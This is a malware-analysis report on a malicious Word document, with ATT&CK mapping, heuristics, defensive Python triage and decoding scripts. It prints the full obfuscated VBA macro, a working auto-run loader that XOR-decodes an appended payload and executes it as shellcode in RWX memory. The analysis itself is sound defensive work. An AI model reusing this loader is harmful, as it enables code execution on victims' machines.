Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1055 Process Injection. The macro allocates executable memory in the Office process itself (NtWriteVirtualMemory is called with the -1 current-process pseudo-handle) and starts a thread on it; no second process is created or hollowed, so the T1055.012 Process Hollowing sub-technique originally assigned here does not fit.
The sample is a Microsoft Office document whose VBA project declares kernel32!VirtualAlloc and kernel32!CreateThread under randomly generated alias names and ntdll!NtWriteVirtualMemory under its real name. On Document_Open the macro reads its own file from disk (ActiveDocument.FullName), splits the contents on a long random-looking delimiter string, keeps the segment after the last occurrence, drops two leading bytes, XOR-decodes the remainder with the repeating key "GjwWaOOJbVFEAYyHgGHwCPZ", copies the result into a fresh MEM_COMMIT (&H1000) / PAGE_EXECUTE_READWRITE (&H40) allocation in its own process and runs it on a new thread. The payload is therefore embedded in the document itself, appended after the marker, and is not fetched by the macro. The ClamAV name 'Doc.Downloader.Powload-6809817-0' indicates that the decoded shellcode is expected to act as a downloader for a second stage, but the macro alone shows no network activity; that has to be confirmed from the decoded blob or from dynamic analysis.
Heuristics (7)
- ClamAV: Doc.Downloader.Powload-6809817-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
- Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC: Reference to VirtualAlloc API
- VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script: "Public Sub Document_Open()", "FtGCibuvnHgQ"
- Workbook_Open macro [low] OLE_VBA_WBOPEN: Workbook_Open macro. Matched lines in script: "Sub Workbook_Open()", "Document_Open". Workbook_Open is an Excel auto-open event and never fires in a Word ThisDocument module; its presence suggests the same loader is dropped into both Word and Excel lures.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the OOXML DrawingML namespace URI carried by any document with drawing content and is not an indicator on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4875 bytes |

SHA-256 (macros.bas): 9cf9dfbbcbdf91c0bcd4068803c2b8c42ab425915fb222163d79c8beb4bf379d
Detection (macros.bas)
ClamAV: No threats found. The Doc.Downloader.Powload signature above fired on the container document, not on the carved macro source.
Obfuscation or payload: likely. 38 of 73 identifiers look randomly generated (e.g. 'iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRN'), consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob; in this script the only long literal is the Split() delimiter, which is a marker rather than payload. The encoded shellcode is not inside the VBA project at all: it is appended to the document file after that marker and is only read back at run time.
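The two static signals above, aliased Win32 imports and name-mangled identifiers, can be reproduced outside the analyzer. The following is an added Python example written for this page, not analyzer code and not part of the sample. It resolves Declare ... Alias statements back to the real API names, flags the allocate / write / run triple that makes an in-process shellcode loader, and applies a simple randomness heuristic to identifiers. The input is a constructed, abridged copy of the macro preview (parameter lists shortened); the keyword list and the 0.2 hump ratio / 5-consonant thresholds are assumptions tuned on this sample.

```python
import re

# Constructed sample input for this added example: an abridged copy of the
# Declare block and the Document_Open handler from the macro preview on this
# page (parameter lists shortened). The real module is the carved macros.bas.
SAMPLE_VBA = '''#If VBA7 Then
Private Declare PtrSafe Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal BrJdvj As Long) As LongPtr
Private Declare PtrSafe Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As LongPtr) As LongPtr
#End If
Public Sub Document_Open()
    FtGCibuvnHgQ
End Sub
'''

# Small keyword list so language tokens are not counted as identifiers
# (assumed sufficient for this sample; extend it for a real corpus).
VBA_KEYWORDS = {w.lower() for w in (
    "If Then Else End Sub Function Private Public Declare PtrSafe Lib Alias "
    "ByVal ByRef As Long LongPtr String Integer Byte Dim Const For To Next Mod "
    "Xor Option Explicit Attribute VBA7 Open Close Get Binary Access Read True "
    "False Erase ReDim Set Call Exit Not And Or").split()}

DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?')

# allocate / write / run triples that make up an in-process shellcode loader
ALLOC = {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"}
WRITE = {"RtlMoveMemory", "NtWriteVirtualMemory", "WriteProcessMemory"}
RUN = {"CreateThread", "CreateRemoteThread", "NtCreateThreadEx"}
VOWELS = set("aeiouAEIOU")


def declared_apis(src):
    """Map real API name -> (name used in VBA, dll), resolving Alias so that
    renamed imports such as nyihufQoVwZuSRqUwpxYnQN still read as CreateThread."""
    apis = {}
    for vba_name, dll, alias in DECLARE_RE.findall(src):
        apis.setdefault(alias or vba_name, (vba_name, dll.lower()))
    return apis


def looks_random(name):
    """Name-mangling heuristic: many camel-case humps per letter, or a consonant
    run no natural word has. Tuned on this sample; it misses some short names."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 6:
        return False
    humps = sum(1 for a, b in zip(name, name[1:]) if a.islower() and b.isupper())
    run = longest = 0
    for c in name:
        run = run + 1 if c.isalpha() and c not in VOWELS else 0
        longest = max(longest, run)
    return humps / len(letters) >= 0.2 or longest >= 5


def identifiers(src):
    """Unique non-keyword identifiers, with string literals and comments removed."""
    code = re.sub(r'"[^"]*"', "", src)
    code = re.sub(r"'[^\n]*", "", code)
    toks = re.findall(r"[A-Za-z_]\w*", code)
    return list(dict.fromkeys(t for t in toks if t.lower() not in VBA_KEYWORDS))


def triage(src):
    """Summarise the static signals the report lists for macros.bas."""
    apis = declared_apis(src)
    names = identifiers(src)
    found = set(apis)
    return {
        "apis": apis,
        "total": len(names),
        "random": sum(looks_random(n) for n in names),
        "loader": bool(found & ALLOC and found & WRITE and found & RUN),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for real, (alias, dll) in result["apis"].items():
        print(f"{dll}!{real} declared as {alias}")
    print(f"{result['random']} of {result['total']} identifiers look random; "
          f"shellcode loader chain: {result['loader']}")
```

On the abridged sample the alias map recovers kernel32!CreateThread and kernel32!VirtualAlloc behind their mangled names, the loader chain is complete, and 6 of the 8 identifiers are flagged as random; the same script run over the full macros.bas lands close to the analyzer's 38 of 73, with the mismatches being short mangled names such as nckOLXenJWUTYC that neither heuristic catches.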
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As LongPtr, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As LongPtr
Private Declare PtrSafe Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As LongPtr, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As LongPtr, ByVal CKNlCeujJMESeHWOAEgTpy As LongPtr, ByVal acnQfmGl As String, ByVal jamNzHXdIl As LongPtr, ByRef taWOzVJImeOveCNjpooW As LongPtr) As LongPtr
#Else
Private Declare Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As Long, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As Long
Private Declare Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As Long, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As Long, ByVal CKNlCeujJMESeHWOAEgTpy As Long, ByVal acnQfmGl As String, ByVal jamNzHXdIl As Long, ByRef taWOzVJImeOveCNjpooW As Long) As Long
#End If
Const ercmlFbQwjOkTy = &H1000
Const TVyrAqVBTnpoiMRSrHpuihWswYzmm = &H40
Public Sub FtGCibuvnHgQ()
Dim SCQNfmCty() As Byte
SCQNfmCty = QzJErMGBSMbpQBfMtxZfKCPN(ActiveDocument.FullName)
Dim MIZsYPloAHKXaDyAvdhUfGzpx As String
MIZsYPloAHKXaDyAvdhUfGzpx = StrConv(SCQNfmCty, 64)
Dim aIcPEWhBTTiJwFbtFjzV
aIcPEWhBTTiJwFbtFjzV = Split(MIZsYPloAHKXaDyAvdhUfGzpx, "iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRNOrUaLnlaOIxKrxjrDIruPiXJMuXfkNhPouBcXsjzbBkMTtdwOdNBNxXFulorpfQbBIwWVhtlzSsoYkPsqBqgaFcRwWILeSkWLjllXgAHJBcVe")
Dim npEQzlEMfjKVsPDmLc As String
Dim nckOLXenJWUTYC As String
Dim tFgjfxdjIkVmZQPIQEvROo As String
nckOLXenJWUTYC = StrConv(StrConv(aIcPEWhBTTiJwFbtFjzV(UBound(aIcPEWhBTTiJwFbtFjzV)), 64), 128)
tFgjfxdjIkVmZQPIQEvROo = Mid$(nckOLXenJWUTYC, 3, Len(nckOLXenJWUTYC))
npEQzlEMfjKVsPDmLc = iiGQsHQtgpasu("GjwWaOOJbVFEAYyHgGHwCPZ", tFgjfxdjIkVmZQPIQEvROo)
#If VBA7 Then
Dim OYrFFFECgdjQjYVqTdFr As LongPtr
Dim DDeQMZgUCQJonzqW As LongPtr
#Else
Dim OYrFFFECgdjQjYVqTdFr As Long
Dim DDeQMZgUCQJonzqW As Long
#End If
OYrFFFECgdjQjYVqTdFr = uFNLBWRvjdKEkYhfxjrCDahxA(0, Len(npEQzlEMfjKVsPDmLc), ercmlFbQwjOkTy, TVyrAqVBTnpoiMRSrHpuihWswYzmm)
DDeQMZgUCQJonzqW = NtWriteVirtualMemory(-1, OYrFFFECgdjQjYVqTdFr, npEQzlEMfjKVsPDmLc, Len(npEQzlEMfjKVsPDmLc), 0)
DDeQMZgUCQJonzqW = nyihufQoVwZuSRqUwpxYnQN(0, 0, OYrFFFECgdjQjYVqTdFr, 0, 0, 0)
End Sub
Public Function QzJErMGBSMbpQBfMtxZfKCPN(ByVal yOeQygUgKebDKneSKMZeTU As String) As Byte()
Dim nckOLXenJWUTYC As Long
Dim tFgjfxdjIkVmZQPIQEvROo() As Byte
nckOLXenJWUTYC = FreeFile
If LenB(Dir(yOeQygUgKebDKneSKMZeTU)) Then
Open yOeQygUgKebDKneSKMZeTU For Binary Access Read As nckOLXenJWUTYC
ReDim tFgjfxdjIkVmZQPIQEvROo(LOF(nckOLXenJWUTYC) - 1&) As Byte
Get nckOLXenJWUTYC, , tFgjfxdjIkVmZQPIQEvROo
Close nckOLXenJWUTYC
Else
Err.Raise 53
End If
QzJErMGBSMbpQBfMtxZfKCPN = tFgjfxdjIkVmZQPIQEvROo
Erase tFgjfxdjIkVmZQPIQEvROo
End Function
Public Sub Document_Open()
FtGCibuvnHgQ
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function iiGQsHQtgpasu(JOVjTCEQLexUndpCLWfnXbzGKBRQO As String, ZyvKgPzHUMNrxBtyuMeDEdmgaIpp As String) As String
Dim rKNbOfZzCWzddbtA As Long
Dim DXnmgeMlsVloJyAjiDbZ As String
Dim IwtZRQEzAcTG As Integer, TGTVzwLrNOsfNZFDlPhLKyisAdy As Integer, a As Long
For rKNbOfZzCWzddbtA = 1 To Len(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp)
a = rKNbOfZzCWzddbtA Mod Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
If a = 0 Then a = Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
IwtZRQEzAcTG = Asc(Mid$(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp, rKNbOfZzCWzddbtA, 1))
TGTVzwLrNOsfNZFDlPhLKyisAdy = Asc(Mid$(JOVjTCEQLexUndpCLWfnXbzGKBRQO, a, 1))
DXnmgeMlsVloJyAjiDbZ = DXnmgeMlsVloJyAjiDbZ + Chr(IwtZRQEzAcTG Xor TGTVzwLrNOsfNZFDlPhLKyisAdy)
Next rKNbOfZzCWzddbtA
iiGQsHQtgpasu = DXnmgeMlsVloJyAjiDbZ
End Function
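The decode chain in FtGCibuvnHgQ (read the document's own bytes, Split on the marker, take the last piece, Mid$ from position 3, XOR with the key in iiGQsHQtgpasu) can be replayed offline to recover the appended blob for further analysis. The following is an added Python example written for this page; it is not analyzer code and not part of the sample. It reuses the delimiter and key literals from the macro above, but assumes the StrConv round-trips in the macro are byte-preserving (true for the ASCII range; bytes above 0x7F depend on the host's ANSI code page) and that the two skipped bytes are a CRLF. The document it runs on when given no path is a constructed stand-in, not the real file, and the "x64 prologue" check is only a common-pattern sanity test.

```python
import sys

# Constants copied from the macro preview on this page: the Split() delimiter
# and the repeating XOR key passed as the first argument to iiGQsHQtgpasu.
DELIMITER = (b"iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRNOrUaLnlaOIxKrxjrDIruPiXJMuXfkNhPouBcXsjz"
             b"bBkMTtdwOdNBNxXFulorpfQbBIwWVhtlzSsoYkPsqBqgaFcRwWILeSkWLjllXgAHJBcVe")
XOR_KEY = b"GjwWaOOJbVFEAYyHgGHwCPZ"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. iiGQsHQtgpasu indexes the key 1-based with
    'i Mod Len(key)' and maps 0 to Len(key); 0-based that is key[i % len]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_payload(doc: bytes, delimiter: bytes = DELIMITER, key: bytes = XOR_KEY):
    """Mirror FtGCibuvnHgQ: keep what follows the LAST delimiter occurrence
    (Split(...)(UBound(...))), drop two leading bytes (Mid$(s, 3, ...)) and
    XOR-decode. Returns None if the marker is absent (the macro would then
    XOR the whole file and try to run the result)."""
    if delimiter not in doc:
        return None
    tail = doc.rsplit(delimiter, 1)[1]
    return xor_repeating(tail[2:], key)


def looks_like_x64_prologue(blob: bytes) -> bool:
    """Sanity check only: 'cld; and rsp,-16' is a common x64 shellcode start.
    A miss does not mean the decode is wrong; disassemble to be sure."""
    return blob[:5] == b"\xfc\x48\x83\xe4\xf0"


def build_sample(payload: bytes, key: bytes = XOR_KEY) -> bytes:
    """Constructed stand-in for the maldoc (not the real file): an OLE magic
    header plus filler, then the delimiter, an assumed CRLF (the two bytes the
    macro skips) and the XOR-encoded blob appended to the end of the file."""
    head = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64
    return head + DELIMITER + b"\r\n" + xor_repeating(payload, key)


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # python decode.py sample.doc
        data = open(sys.argv[1], "rb").read()
    else:                                      # offline demo on the constructed file
        data = build_sample(b"\xfc\x48\x83\xe4\xf0" + b"\x90" * 27)
    blob = extract_payload(data)
    if blob is None:
        print("delimiter not found")
    else:
        print(f"decoded {len(blob)} bytes, x64 prologue: {looks_like_x64_prologue(blob)}")
        print(blob[:16].hex())
```

Point it at the original .doc (not at macros.bas, which does not contain the blob) and write the decoded bytes to disk for disassembly or sandboxing; that is where the "downloader" behaviour implied by the ClamAV name would have to be confirmed.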